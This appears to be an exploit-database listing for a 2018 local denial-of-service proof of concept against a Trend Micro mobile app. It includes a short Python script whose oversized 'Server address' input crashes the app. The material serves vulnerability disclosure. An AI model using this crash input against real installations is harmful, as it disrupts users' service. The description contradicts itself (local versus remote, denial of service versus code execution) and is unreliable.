Trend Micro Virtual Mobile Infrastructure 5.5.1336 - 'Server address' Denial of Service (PoC)

vendor:

Virtual Mobile Infrastructure

by:

Luis Martinez

7.8

CVSS

HIGH

Denial of Service (DoS) Local

CWE

Product Name: Virtual Mobile Infrastructure

Affected Version From: 5.5.1336

Affected Version To: 5.5.1336

Patch Exists: YES

Related CWE: N/A

CPE: a:trend_micro:virtual_mobile_infrastructure:5.5.1336

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: iPhone 7 iOS 11.4.1

2018

Trend Micro Virtual Mobile Infrastructure 5.5.1336 – ‘Server address’ Denial of Service (PoC)

The vulnerability exists due to a boundary error when handling user-supplied input in the 'Server address' field. A remote attacker can create a specially crafted input, send it to the vulnerable application and execute arbitrary code on the system. An attacker can exploit this vulnerability to cause a denial of service condition.

Mitigation:

Upgrade to the latest version of Trend Micro Virtual Mobile Infrastructure 5.5.1336 or later.

Source

Exploit-DB raw data:

# Exploit Title: Trend Micro Virtual Mobile Infrastructure 5.5.1336 - 'Server address' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2018-09-01
# Vendor Homepage: http://www.trendmicro.com.tr/media/ds/virtual-mobile-infrastructure-datasheet-en.pdf
# Software Link: App Store for iOS devices
# Tested Version: 5.5.1336
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: iPhone 7 iOS 11.4.1

# Steps to Produce the Crash:
# 1.- Run python code: Virtual_Mobile_Infrastructure_5.5.1336.py
# 2.- Copy content to clipboard
# 3.- Open App Vitual Mobile Infrastructure
# 4.- Paste ClipBoard on "Server address"
# 5.- Next
# 6.- Crashed

#!/usr/bin/env python

buffer = "\x41" * 15000
print (buffer)